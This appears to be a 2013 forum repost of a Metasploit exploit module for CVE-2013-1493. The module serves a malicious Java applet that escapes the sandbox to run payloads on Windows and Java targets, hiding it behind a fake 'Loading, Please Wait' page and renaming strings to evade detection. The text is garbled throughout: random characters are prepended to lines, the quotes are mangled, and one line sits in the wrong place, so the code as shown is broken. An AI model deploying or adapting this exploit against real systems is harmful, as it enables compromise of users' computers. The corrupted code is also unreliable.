##2 y9 \) ?9 q/ A( `) o
) C. e3 n: ?: J
# This file is part of the Metasploit Framework and may be subject to
: R3 A" E) O# x P, q+ E# redistribution and commercial restrictions. Please see the Metasploit
' @* U: w2 ~ q* I7 ?' J# web site for more information on licensing and terms of use.
. @: r3 n/ j% P# U, K5 I# http://metasploit.com/
0 W+ z! _( N. S2 J7 m3 d( n##6 b0 l$ H' d! j, l# y8 t; L
require ‘msf/core’% E8 u8 D* e: w5 ]1 Q
require ‘rex’' |4 k" g" v7 v9 H. p
class Metasploit3 < Msf::Exploit::Remote& f" @7 n: o) [5 q- x( r" ?4 ?
Rank = NormalRanking
s0 m! c5 R* {) p+ q! x" E. ]include Msf::Exploit::Remote::HttpServer::HTML
$ \+ {) B; h* J; F& O6 Iinclude Msf::Exploit::EXE
e7 |( Z* g1 h4 Xinclude Msf::Exploit::Remote::BrowserAutopwn+ x9 {# r/ _5 K
autopwn_info({ :javascript => false })' T! ]0 I, Z$ ?3 u8 P6 I& ^
def initialize( info = {} )5 ]) ~" {! A# M3 l% l: s7 {- U
super( update_info( info,- G& s6 O; R) |1 d
‘Name’ => ‘Java CMM Remote Code Execution’,7 v, z, r2 J% H
‘Description’ => %q{" E$ Q$ R/ j5 k* G# D2 ~% W3 Z
This module abuses the Color Management classes from a Java Applet to run
; O8 c8 I4 v0 r! garbitrary Java code outside of the sandbox as exploited in the wild in February
- |* I: n9 l1 S. |7 land March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
~% ?. w/ k4 J1 Uand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
) C5 W0 @: y2 K; r2 isystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
6 i* m0 Y4 t0 o6 Xwarning in order to run the malicious applet.
3 ~* R+ v$ H7 H( `5 p},6 Z4 `) h% ~2 ?
‘License’ => MSF_LICENSE,
. h3 N3 _, l! i‘Author’ =>
( I' t' D3 ?& R+ C4 T6 D! F3 h! _5 B) ~'Unknown', # Vulnerability discovery and Exploit
. n8 ~% D$ B/ ?) k6 x'juan vazquez' # Metasploit module (just ported the published exploit)3 T6 {* F8 k$ S9 y9 _, L
],
, [% _9 T% t/ A‘References’ =>- J4 }0 x$ G; J6 e9 f( Z5 W
[
& V! ^; ~0 M) ^- Y% k[ 'CVE', '2013-1493' ],1 K9 B) N0 B9 o, [3 K- }# c7 p6 e
[ 'OSVDB', '90737' ],
7 k. [8 F. Z, [, `" U0 V% D% D9 }[ 'BID', '58238' ],! B P. M& I* F7 \! [. ?- }
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],5 p& q" a4 p2 @
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],& q. U* B* G5 P- o5 O; {
[ 'URL', 'http://pastie.org/pastes/6581034' ]
' ?. C2 s2 j" Y$ S3 t$ G% V! h6 D],
$ |% N c: F1 }‘Platform’ => [ 'win', 'java' ],
9 Q. |1 R0 Q* `‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
9 Q, `6 g8 p5 F e7 }- i! m‘Targets’ =>
5 I4 x2 y% t6 R7 D5 ~[
. l5 ~; [, Q3 t, Q3 U7 E[ 'Generic (Java Payload)',& s8 R" a5 w7 N, J
{! K7 N; k: _4 V L: \! G
'Platform' => 'java',' ]+ I: l# o8 c2 m
'Arch' => ARCH_JAVA
5 E; X+ b6 Q n}
8 s0 v+ ] a' M8 z l: E) ?],' [$ O8 m; L. H
[ 'Windows x86 (Native Payload)',
8 f( t4 o, W* ^{$ g/ I7 A! N6 {, ~) }) ?" M" n0 v
'Platform' => 'win',
' L7 ?4 [! l% m% H; Q'Arch' => ARCH_X86- l D6 J- E4 S0 `: \4 Z
}
]3 E: t0 P/ `! W: F# X4 D8 @1 K]% K; m9 ~6 }: n {: e. E
],5 x6 Z, P3 x6 p$ a% f' |
‘‘DisclosureDate’ => ‘Mar 01 2013′( o& t$ }" N" }, V8 y/ i
))
, A$ X* A$ ^( I4 V. i4 Zend
2 y" @8 k9 ~/ J! I7 D" D- O6 fdef setup) r8 t$ x) E/ u F* S2 m
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
0 u' }0 l4 j1 `5 |@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }* {. ~8 I1 U( N$ z
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
2 m* p+ Q; I& v@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }' Q" D$ V+ _$ l+ o& S1 K
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)( q9 n2 t9 _# T9 ~
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
, o1 L; @+ \: B8 Opath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)) H5 g9 h8 s/ o ?+ C2 S. O
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }+ C; k+ C+ s9 b) ~' J' o" U9 }/ W
@init_class_name = rand_text_alpha(“Init”.length) v- g$ [6 k* [7 @5 E' O
@init_class.gsub!(“Init”, @init_class_name)
5 ~6 ?. i9 a* xsuper; G1 ?! W y+ K2 u6 X+ J* Q4 y
end3 c- W4 t; Y; B0 I* ]
def on_request_uri(cli, request)
4 s- L+ t/ j( Y0 J4 o$ A! Y O7 [$ tprint_status(“handling request for #{request.uri}”)) c) w {1 V; m8 k! B( U' u
case request.uri9 S, o# w5 K: h( C- {
when /\.jar$/i" M3 W% Q0 L7 B# O& z0 G
jar = payload.encoded_jar
0 \& {. O* g. Q" W! l$ x) tjar.add_file(“#{@init_class_name}.class”, @init_class)
0 p' d" t$ L* n7 G2 w8 C' R+ mjar.add_file(“Leak.class”, @leak_class)
( E: D* L" H$ L2 z: T9 q3 Hjar.add_file(“MyBufferedImage.class”, @buffered_image_class)/ ?, O) y: i& @: M
jar.add_file(“MyColorSpace.class”, @color_space_class)
' H' Z6 R1 W0 z/ f3 k; ZDefaultTarget’ => 1,' m6 N, y# U$ C# m; v% ]
metasploit_str = rand_text_alpha(“metasploit”.length) ], J: t+ d/ b5 l' }: u# a
payload_str = rand_text_alpha(“payload”.length)8 F7 `, p9 t& P6 D
jar.entries.each { |entry|; b4 z5 y3 H# P4 x5 I( ~1 C
entry.name.gsub!(“metasploit”, metasploit_str) V9 V& c" x1 e. @" |
entry.name.gsub!(“Payload”, payload_str) H2 W8 G0 f& e
entry.data = entry.data.gsub(“metasploit”, metasploit_str)4 \! q7 N7 J) s y7 n
entry.data = entry.data.gsub(“Payload”, payload_str)
, D5 u b/ c h1 F, E8 F, ~}; F7 T( r) m( x" ~
jar.build_manifest' [& u; L4 S5 N4 c# U
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
# j6 x7 ^# J# Vwhen /\/$/* Y' j& q% W: d' o, E! s9 T0 _
payload = regenerate_payload(cli)+ V6 Z3 J J# o5 k2 ~# L* _: o% i
if not payload
( C3 k" t, Z8 _; t n( a1 @7 r) Lprint_error(“Failed to generate the payload.”)
6 v8 q5 }" d9 o8 i6 Wsend_not_found(cli)
! E/ v: Q1 Y7 Y: [2 a0 H( [: \return9 f2 t F# b6 |
end2 f+ o* F- a6 I! M2 A: Z/ \. x
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
$ Z0 M( R5 z& x. x# E: Kelse
& g* f7 {! D' [% ~: a% H* esend_redirect(cli, get_resource() + ‘/’, ”)
4 m/ m/ Y$ |$ R* L0 Vend% V8 _2 ]. i( A$ b4 [, H
end
2 {+ w" U* l2 Z, [+ b8 L0 Gdef generate_html8 P+ l7 X7 k, z. J2 }
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
& g# k0 e3 N" G# }! yhtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|* _$ R" j% l* F
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
9 g, g0 h& l! t' vhtml += %Q|</applet></body></html>|! R9 W& W! Q& a; K& l9 T
return html- U) L0 V, X6 Z. D% _& o; p
end
1 Z! ~$ Z8 `8 D2 o3 zend! l0 ^) M3 ]4 N% y( m
end9 [6 u, ?3 w4 w0 o" ], `
|
发表于 2013-4-4 17:31:17
收藏
支持
反对